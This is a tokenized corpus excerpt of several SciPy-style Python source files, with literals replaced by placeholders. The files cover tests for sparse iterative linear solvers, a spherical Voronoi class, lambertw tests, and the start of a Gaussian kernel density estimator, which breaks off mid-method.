<s> """<STR_LIT>""" <EOL> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> import numpy as np <EOL> from numpy . testing import ( TestCase , assert_equal , assert_array_equal , <EOL> assert_ , assert_allclose , assert_raises , run_module_suite ) <EOL> from numpy import zeros , arange , array , abs , max , ones , eye , iscomplexobj <EOL> from scipy . linalg import norm <EOL> from scipy . sparse import spdiags , csr_matrix , SparseEfficiencyWarning <EOL> from scipy . sparse . linalg import LinearOperator , aslinearoperator <EOL> from scipy . sparse . linalg . isolve import cg , cgs , bicg , bicgstab , gmres , qmr , minres , lgmres <EOL> class Case ( object ) : <EOL> def __init__ ( self , name , A , skip = None ) : <EOL> self . name = name <EOL> self . A = A <EOL> if skip is None : <EOL> self . skip = [ ] <EOL> else : <EOL> self . skip = skip <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . name <EOL> class IterativeParams ( object ) : <EOL> def __init__ ( self ) : <EOL> solvers = [ cg , cgs , bicg , bicgstab , gmres , qmr , minres , lgmres ] <EOL> sym_solvers = [ minres , cg ] <EOL> posdef_solvers = [ cg ] <EOL> real_solvers = [ minres ] <EOL> self . solvers = solvers <EOL> self . cases = [ ] <EOL> N = <NUM_LIT> <EOL> data = ones ( ( <NUM_LIT:3> , N ) ) <EOL> data [ <NUM_LIT:0> , : ] = <NUM_LIT:2> <EOL> data [ <NUM_LIT:1> , : ] = - <NUM_LIT:1> <EOL> data [ <NUM_LIT:2> , : ] = - <NUM_LIT:1> <EOL> Poisson1D = spdiags ( data , [ <NUM_LIT:0> , - <NUM_LIT:1> , <NUM_LIT:1> ] , N , N , format = '<STR_LIT>' ) <EOL> self . Poisson1D = Case ( "<STR_LIT>" , Poisson1D ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , Poisson1D ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , Poisson1D . astype ( '<STR_LIT:f>' ) , <EOL> skip = [ minres ] ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , - Poisson1D , <EOL> skip = posdef_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , ( - Poisson1D ) . 
astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers + [ minres ] ) ) <EOL> data = array ( [ [ <NUM_LIT:6> , - <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:7> , - <NUM_LIT:1> , <NUM_LIT:10> , <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:8> , <NUM_LIT:9> ] ] , dtype = '<STR_LIT:d>' ) <EOL> RandDiag = spdiags ( data , [ <NUM_LIT:0> ] , <NUM_LIT:10> , <NUM_LIT:10> , format = '<STR_LIT>' ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , RandDiag , skip = posdef_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , RandDiag . astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , skip = posdef_solvers + sym_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers + sym_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> data = data + data . T <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , skip = posdef_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:f>' ) , <EOL> skip = posdef_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:9> , <NUM_LIT:9> ) <EOL> data = np . dot ( data . conj ( ) , data . T ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:f>' ) , <EOL> skip = [ minres ] ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) + <NUM_LIT> * np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , <EOL> skip = posdef_solvers + sym_solvers + real_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . 
astype ( '<STR_LIT:F>' ) , <EOL> skip = posdef_solvers + sym_solvers + real_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) + <NUM_LIT> * np . random . rand ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> data = data + data . T . conj ( ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , <EOL> skip = posdef_solvers + real_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:F>' ) , <EOL> skip = posdef_solvers + real_solvers ) ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> data = np . random . rand ( <NUM_LIT:9> , <NUM_LIT:9> ) + <NUM_LIT> * np . random . rand ( <NUM_LIT:9> , <NUM_LIT:9> ) <EOL> data = np . dot ( data . conj ( ) , data . T ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data , skip = real_solvers ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , data . astype ( '<STR_LIT:F>' ) , <EOL> skip = real_solvers ) ) <EOL> data = ones ( ( <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> data [ <NUM_LIT:0> , : ] = <NUM_LIT:2> <EOL> data [ <NUM_LIT:1> , : ] = - <NUM_LIT:1> <EOL> A = spdiags ( data , [ <NUM_LIT:0> , - <NUM_LIT:1> ] , <NUM_LIT:10> , <NUM_LIT:10> , format = '<STR_LIT>' ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , A , <EOL> skip = sym_solvers + [ cgs , qmr , bicg ] ) ) <EOL> self . cases . append ( Case ( "<STR_LIT>" , A . astype ( '<STR_LIT:F>' ) , <EOL> skip = sym_solvers + [ cgs , qmr , bicg ] ) ) <EOL> params = None <EOL> def setup_module ( ) : <EOL> global params <EOL> params = IterativeParams ( ) <EOL> def check_maxiter ( solver , case ) : <EOL> A = case . A <EOL> tol = <NUM_LIT> <EOL> b = arange ( A . shape [ <NUM_LIT:0> ] , dtype = float ) <EOL> x0 = <NUM_LIT:0> * b <EOL> residuals = [ ] <EOL> def callback ( x ) : <EOL> residuals . append ( norm ( b - case . 
A * x ) ) <EOL> x , info = solver ( A , b , x0 = x0 , tol = tol , maxiter = <NUM_LIT:3> , callback = callback ) <EOL> assert_equal ( len ( residuals ) , <NUM_LIT:3> ) <EOL> assert_equal ( info , <NUM_LIT:3> ) <EOL> def test_maxiter ( ) : <EOL> case = params . Poisson1D <EOL> for solver in params . solvers : <EOL> if solver in case . skip : <EOL> continue <EOL> yield check_maxiter , solver , case <EOL> def assert_normclose ( a , b , tol = <NUM_LIT> ) : <EOL> residual = norm ( a - b ) <EOL> tolerance = tol * norm ( b ) <EOL> msg = "<STR_LIT>" % ( residual , tolerance ) <EOL> assert_ ( residual < tolerance , msg = msg ) <EOL> def check_convergence ( solver , case ) : <EOL> A = case . A <EOL> if A . dtype . char in "<STR_LIT>" : <EOL> tol = <NUM_LIT> <EOL> else : <EOL> tol = <NUM_LIT> <EOL> b = arange ( A . shape [ <NUM_LIT:0> ] , dtype = A . dtype ) <EOL> x0 = <NUM_LIT:0> * b <EOL> x , info = solver ( A , b , x0 = x0 , tol = tol ) <EOL> assert_array_equal ( x0 , <NUM_LIT:0> * b ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A . dot ( x ) , b , tol = tol ) <EOL> def test_convergence ( ) : <EOL> for solver in params . solvers : <EOL> for case in params . cases : <EOL> if solver in case . skip : <EOL> continue <EOL> yield check_convergence , solver , case <EOL> def check_precond_dummy ( solver , case ) : <EOL> tol = <NUM_LIT> <EOL> def identity ( b , which = None ) : <EOL> """<STR_LIT>""" <EOL> return b <EOL> A = case . A <EOL> M , N = A . shape <EOL> D = spdiags ( [ <NUM_LIT:1.0> / A . diagonal ( ) ] , [ <NUM_LIT:0> ] , M , N ) <EOL> b = arange ( A . shape [ <NUM_LIT:0> ] , dtype = float ) <EOL> x0 = <NUM_LIT:0> * b <EOL> precond = LinearOperator ( A . 
shape , identity , rmatvec = identity ) <EOL> if solver is qmr : <EOL> x , info = solver ( A , b , M1 = precond , M2 = precond , x0 = x0 , tol = tol ) <EOL> else : <EOL> x , info = solver ( A , b , M = precond , x0 = x0 , tol = tol ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A . dot ( x ) , b , tol ) <EOL> A = aslinearoperator ( A ) <EOL> A . psolve = identity <EOL> A . rpsolve = identity <EOL> x , info = solver ( A , b , x0 = x0 , tol = tol ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A * x , b , tol = tol ) <EOL> def test_precond_dummy ( ) : <EOL> case = params . Poisson1D <EOL> for solver in params . solvers : <EOL> if solver in case . skip : <EOL> continue <EOL> yield check_precond_dummy , solver , case <EOL> def test_gmres_basic ( ) : <EOL> A = np . vander ( np . arange ( <NUM_LIT:10> ) + <NUM_LIT:1> ) [ : , : : - <NUM_LIT:1> ] <EOL> b = np . zeros ( <NUM_LIT:10> ) <EOL> b [ <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> x = np . linalg . solve ( A , b ) <EOL> x_gm , err = gmres ( A , b , restart = <NUM_LIT:5> , maxiter = <NUM_LIT:1> ) <EOL> assert_allclose ( x_gm [ <NUM_LIT:0> ] , <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_reentrancy ( ) : <EOL> non_reentrant = [ cg , cgs , bicg , bicgstab , gmres , qmr ] <EOL> reentrant = [ lgmres , minres ] <EOL> for solver in reentrant + non_reentrant : <EOL> yield _check_reentrancy , solver , solver in reentrant <EOL> def _check_reentrancy ( solver , is_reentrant ) : <EOL> def matvec ( x ) : <EOL> A = np . array ( [ [ <NUM_LIT:1.0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] ] ) <EOL> y , info = solver ( A , x ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> return y <EOL> b = np . array ( [ <NUM_LIT:1> , <NUM_LIT:1.> / <NUM_LIT:2> , <NUM_LIT:1.> / <NUM_LIT:3> ] ) <EOL> op = LinearOperator ( ( <NUM_LIT:3> , <NUM_LIT:3> ) , matvec = matvec , rmatvec = matvec , <EOL> dtype = b . 
dtype ) <EOL> if not is_reentrant : <EOL> assert_raises ( RuntimeError , solver , op , b ) <EOL> else : <EOL> y , info = solver ( op , b ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_allclose ( y , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> class TestQMR ( TestCase ) : <EOL> def test_leftright_precond ( self ) : <EOL> """<STR_LIT>""" <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" , category = SparseEfficiencyWarning ) <EOL> from scipy . sparse . linalg . dsolve import splu <EOL> from scipy . sparse . linalg . interface import LinearOperator <EOL> n = <NUM_LIT:100> <EOL> dat = ones ( n ) <EOL> A = spdiags ( [ - <NUM_LIT:2> * dat , <NUM_LIT:4> * dat , - dat ] , [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , n , n ) <EOL> b = arange ( n , dtype = '<STR_LIT:d>' ) <EOL> L = spdiags ( [ - dat / <NUM_LIT:2> , dat ] , [ - <NUM_LIT:1> , <NUM_LIT:0> ] , n , n ) <EOL> U = spdiags ( [ <NUM_LIT:4> * dat , - dat ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] , n , n ) <EOL> L_solver = splu ( L ) <EOL> U_solver = splu ( U ) <EOL> def L_solve ( b ) : <EOL> return L_solver . solve ( b ) <EOL> def U_solve ( b ) : <EOL> return U_solver . solve ( b ) <EOL> def LT_solve ( b ) : <EOL> return L_solver . solve ( b , '<STR_LIT:T>' ) <EOL> def UT_solve ( b ) : <EOL> return U_solver . solve ( b , '<STR_LIT:T>' ) <EOL> M1 = LinearOperator ( ( n , n ) , matvec = L_solve , rmatvec = LT_solve ) <EOL> M2 = LinearOperator ( ( n , n ) , matvec = U_solve , rmatvec = UT_solve ) <EOL> x , info = qmr ( A , b , tol = <NUM_LIT> , maxiter = <NUM_LIT:15> , M1 = M1 , M2 = M2 ) <EOL> assert_equal ( info , <NUM_LIT:0> ) <EOL> assert_normclose ( A * x , b , tol = <NUM_LIT> ) <EOL> class TestGMRES ( TestCase ) : <EOL> def test_callback ( self ) : <EOL> def store_residual ( r , rvec ) : <EOL> rvec [ rvec . nonzero ( ) [ <NUM_LIT:0> ] . 
max ( ) + <NUM_LIT:1> ] = r <EOL> A = csr_matrix ( array ( [ [ - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:2> ] ] ) ) <EOL> b = ones ( ( A . shape [ <NUM_LIT:0> ] , ) ) <EOL> maxiter = <NUM_LIT:1> <EOL> rvec = zeros ( maxiter + <NUM_LIT:1> ) <EOL> rvec [ <NUM_LIT:0> ] = <NUM_LIT:1.0> <EOL> callback = lambda r : store_residual ( r , rvec ) <EOL> x , flag = gmres ( A , b , x0 = zeros ( A . shape [ <NUM_LIT:0> ] ) , tol = <NUM_LIT> , maxiter = maxiter , callback = callback ) <EOL> diff = max ( abs ( ( rvec - array ( [ <NUM_LIT:1.0> , <NUM_LIT> ] ) ) ) ) <EOL> assert_ ( diff < <NUM_LIT> ) <EOL> def test_abi ( self ) : <EOL> A = eye ( <NUM_LIT:2> ) <EOL> b = ones ( <NUM_LIT:2> ) <EOL> r_x , r_info = gmres ( A , b ) <EOL> r_x = r_x . astype ( complex ) <EOL> x , info = gmres ( A . astype ( complex ) , b . astype ( complex ) ) <EOL> assert_ ( iscomplexobj ( x ) ) <EOL> assert_allclose ( r_x , x ) <EOL> assert_ ( r_info == info ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import numpy . matlib <EOL> import scipy <EOL> import itertools <EOL> from scipy . _lib . _version import NumpyVersion <EOL> HAS_NUMPY_VEC_DET = ( NumpyVersion ( np . __version__ ) >= '<STR_LIT>' ) <EOL> __all__ = [ '<STR_LIT>' ] <EOL> def calc_circumcenters ( tetrahedrons ) : <EOL> """<STR_LIT>""" <EOL> num = tetrahedrons . shape [ <NUM_LIT:0> ] <EOL> a = np . concatenate ( ( tetrahedrons , np . ones ( ( num , <NUM_LIT:4> , <NUM_LIT:1> ) ) ) , axis = <NUM_LIT:2> ) <EOL> sums = np . sum ( tetrahedrons ** <NUM_LIT:2> , axis = <NUM_LIT:2> ) <EOL> d = np . concatenate ( ( sums [ : , : , np . newaxis ] , a ) , axis = <NUM_LIT:2> ) <EOL> dx = np . delete ( d , <NUM_LIT:1> , axis = <NUM_LIT:2> ) <EOL> dy = np . delete ( d , <NUM_LIT:2> , axis = <NUM_LIT:2> ) <EOL> dz = np . delete ( d , <NUM_LIT:3> , axis = <NUM_LIT:2> ) <EOL> if HAS_NUMPY_VEC_DET : <EOL> dx = np . linalg . det ( dx ) <EOL> dy = - np . linalg . det ( dy ) <EOL> dz = np . linalg . det ( dz ) <EOL> a = np . linalg . det ( a ) <EOL> else : <EOL> dx = np . array ( [ np . linalg . det ( m ) for m in dx ] ) <EOL> dy = - np . array ( [ np . linalg . det ( m ) for m in dy ] ) <EOL> dz = np . array ( [ np . linalg . det ( m ) for m in dz ] ) <EOL> a = np . array ( [ np . linalg . det ( m ) for m in a ] ) <EOL> nominator = np . vstack ( ( dx , dy , dz ) ) <EOL> denominator = <NUM_LIT:2> * a <EOL> return ( nominator / denominator ) . T <EOL> def project_to_sphere ( points , center , radius ) : <EOL> """<STR_LIT>""" <EOL> lengths = scipy . spatial . distance . cdist ( points , np . array ( [ center ] ) ) <EOL> return ( points - center ) / lengths * radius + center <EOL> class SphericalVoronoi : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , points , radius = None , center = None ) : <EOL> """<STR_LIT>""" <EOL> self . points = points <EOL> if np . any ( center ) : <EOL> self . center = center <EOL> else : <EOL> self . center = np . 
zeros ( <NUM_LIT:3> ) <EOL> if radius : <EOL> self . radius = radius <EOL> else : <EOL> self . radius = <NUM_LIT:1> <EOL> self . vertices = None <EOL> self . regions = None <EOL> self . _tri = None <EOL> self . _calc_vertices_regions ( ) <EOL> def _calc_vertices_regions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _tri = scipy . spatial . ConvexHull ( self . points ) <EOL> tetrahedrons = self . _tri . points [ self . _tri . simplices ] <EOL> tetrahedrons = np . insert ( <EOL> tetrahedrons , <EOL> <NUM_LIT:3> , <EOL> np . array ( [ self . center ] ) , <EOL> axis = <NUM_LIT:1> <EOL> ) <EOL> circumcenters = calc_circumcenters ( tetrahedrons ) <EOL> self . vertices = project_to_sphere ( <EOL> circumcenters , <EOL> self . center , <EOL> self . radius <EOL> ) <EOL> generator_indices = np . arange ( self . points . shape [ <NUM_LIT:0> ] ) <EOL> filter_tuple = np . where ( ( np . expand_dims ( self . _tri . simplices , <EOL> - <NUM_LIT:1> ) == generator_indices ) . any ( axis = <NUM_LIT:1> ) ) <EOL> list_tuples_associations = zip ( filter_tuple [ <NUM_LIT:1> ] , <EOL> filter_tuple [ <NUM_LIT:0> ] ) <EOL> list_tuples_associations = sorted ( list_tuples_associations , <EOL> key = lambda t : t [ <NUM_LIT:0> ] ) <EOL> groups = [ ] <EOL> for k , g in itertools . groupby ( list_tuples_associations , <EOL> lambda t : t [ <NUM_LIT:0> ] ) : <EOL> groups . append ( [ element [ <NUM_LIT:1> ] for element in list ( g ) ] ) <EOL> self . regions = groups <EOL> def sort_vertices_of_regions ( self ) : <EOL> """<STR_LIT>""" <EOL> for n in range ( <NUM_LIT:0> , len ( self . regions ) ) : <EOL> remaining = self . regions [ n ] [ : ] <EOL> sorted_vertices = [ ] <EOL> current_simplex = remaining [ <NUM_LIT:0> ] <EOL> current_vertex = [ k for k in self . _tri . simplices [ current_simplex ] <EOL> if k != n ] [ <NUM_LIT:0> ] <EOL> remaining . remove ( current_simplex ) <EOL> sorted_vertices . 
append ( current_simplex ) <EOL> while remaining : <EOL> current_simplex = [ <EOL> s for s in remaining <EOL> if current_vertex in self . _tri . simplices [ s ] <EOL> ] [ <NUM_LIT:0> ] <EOL> current_vertex = [ <EOL> s for s in self . _tri . simplices [ current_simplex ] <EOL> if s != n and s != current_vertex <EOL> ] [ <NUM_LIT:0> ] <EOL> remaining . remove ( current_simplex ) <EOL> sorted_vertices . append ( current_simplex ) <EOL> self . regions [ n ] = sorted_vertices </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import numpy as np <EOL> from numpy . testing import assert_ , assert_equal , assert_array_almost_equal <EOL> from scipy . special import lambertw <EOL> from numpy import nan , inf , pi , e , isnan , log , r_ , array , complex_ <EOL> from scipy . special . _testutils import FuncData <EOL> def test_values ( ) : <EOL> assert_ ( isnan ( lambertw ( nan ) ) ) <EOL> assert_equal ( lambertw ( inf , <NUM_LIT:1> ) . real , inf ) <EOL> assert_equal ( lambertw ( inf , <NUM_LIT:1> ) . imag , <NUM_LIT:2> * pi ) <EOL> assert_equal ( lambertw ( - inf , <NUM_LIT:1> ) . real , inf ) <EOL> assert_equal ( lambertw ( - inf , <NUM_LIT:1> ) . imag , <NUM_LIT:3> * pi ) <EOL> assert_equal ( lambertw ( <NUM_LIT:1.> ) , lambertw ( <NUM_LIT:1.> , <NUM_LIT:0> ) ) <EOL> data = [ <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:0> + <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> ( inf , <NUM_LIT:0> , inf ) , <EOL> ( <NUM_LIT:0> , - <NUM_LIT:1> , - inf ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:1> , - inf ) , <EOL> ( <NUM_LIT:0> , <NUM_LIT:3> , - inf ) , <EOL> ( e , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( - pi / <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT> * pi / <NUM_LIT:2> ) , <EOL> ( - log ( <NUM_LIT:2> ) / <NUM_LIT:2> , <NUM_LIT:0> , - log ( <NUM_LIT:2> ) ) , <EOL> ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> ) , <EOL> ( <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:4> , <NUM_LIT:0> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:4> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - 
<NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT> - <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , <NUM_LIT:1> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , - <NUM_LIT:1> , <NUM_LIT> - <NUM_LIT> ) , <EOL> ( <NUM_LIT:1000> , <NUM_LIT:5> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT> + <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:3> + <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( <NUM_LIT:3> + <NUM_LIT> , - <NUM_LIT:1> , <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:0.5> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , - <NUM_LIT:2> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:4> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:1.> / <NUM_LIT> , <NUM_LIT:5> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:0> , <NUM_LIT> + <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:4> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:0> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:1> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , - <NUM_LIT:1> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - ( <NUM_LIT:2> + <NUM_LIT> ) / <NUM_LIT:10> , <NUM_LIT:4> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( pi , <NUM_LIT:0> , <NUM_LIT> ) , <EOL> ( - <NUM_LIT:0.5> + <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT:0.5> - <NUM_LIT> , 
<NUM_LIT:0> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ( - <NUM_LIT> + <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> + <NUM_LIT> ) , <EOL> ( - <NUM_LIT> - <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> - <NUM_LIT> ) , <EOL> ] <EOL> data = array ( data , dtype = complex_ ) <EOL> def w ( x , y ) : <EOL> return lambertw ( x , y . real . astype ( int ) ) <EOL> olderr = np . seterr ( all = '<STR_LIT:ignore>' ) <EOL> try : <EOL> FuncData ( w , data , ( <NUM_LIT:0> , <NUM_LIT:1> ) , <NUM_LIT:2> , rtol = <NUM_LIT> , atol = <NUM_LIT> ) . check ( ) <EOL> finally : <EOL> np . seterr ( ** olderr ) <EOL> def test_ufunc ( ) : <EOL> assert_array_almost_equal ( <EOL> lambertw ( r_ [ <NUM_LIT:0.> , e , <NUM_LIT:1.> ] ) , r_ [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT> ] ) <EOL> def test_lambertw_ufunc_loop_selection ( ) : <EOL> dt = np . dtype ( np . complex128 ) <EOL> assert_equal ( lambertw ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) . dtype , dt ) <EOL> assert_equal ( lambertw ( [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:0> ) . dtype , dt ) <EOL> assert_equal ( lambertw ( <NUM_LIT:0> , [ <NUM_LIT:0> ] , <NUM_LIT:0> ) . dtype , dt ) <EOL> assert_equal ( lambertw ( <NUM_LIT:0> , <NUM_LIT:0> , [ <NUM_LIT:0> ] ) . dtype , dt ) <EOL> assert_equal ( lambertw ( [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ) . dtype , dt ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import warnings <EOL> from scipy . _lib . six import callable , string_types <EOL> from scipy import linalg , special <EOL> from numpy import atleast_2d , reshape , zeros , newaxis , dot , exp , pi , sqrt , ravel , power , atleast_1d , squeeze , sum , transpose <EOL> import numpy as np <EOL> from numpy . random import randint , multivariate_normal <EOL> from . import mvn <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class gaussian_kde ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dataset , bw_method = None ) : <EOL> self . dataset = atleast_2d ( dataset ) <EOL> if not self . dataset . size > <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . d , self . n = self . dataset . shape <EOL> self . set_bandwidth ( bw_method = bw_method ) <EOL> def evaluate ( self , points ) : <EOL> """<STR_LIT>""" <EOL> points = atleast_2d ( points ) <EOL> d , m = points . shape <EOL> if d != self . d : <EOL> if d == <NUM_LIT:1> and m == self . d : <EOL> points = reshape ( points , ( self . d , <NUM_LIT:1> ) ) <EOL> m = <NUM_LIT:1> <EOL> else : <EOL> msg = "<STR_LIT>" % ( d , <EOL> self . d ) <EOL> raise ValueError ( msg ) <EOL> result = zeros ( ( m , ) , dtype = float ) <EOL> if m >= self . n : <EOL> for i in range ( self . n ) : <EOL> diff = self . dataset [ : , i , newaxis ] - points <EOL> tdiff = dot ( self . inv_cov , diff ) <EOL> energy = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result = result + exp ( - energy ) <EOL> else : <EOL> for i in range ( m ) : <EOL> diff = self . dataset - points [ : , i , newaxis ] <EOL> tdiff = dot ( self . inv_cov , diff ) <EOL> energy = sum ( diff * tdiff , axis = <NUM_LIT:0> ) / <NUM_LIT> <EOL> result [ i ] = sum ( exp ( - energy ) , axis = <NUM_LIT:0> ) <EOL> 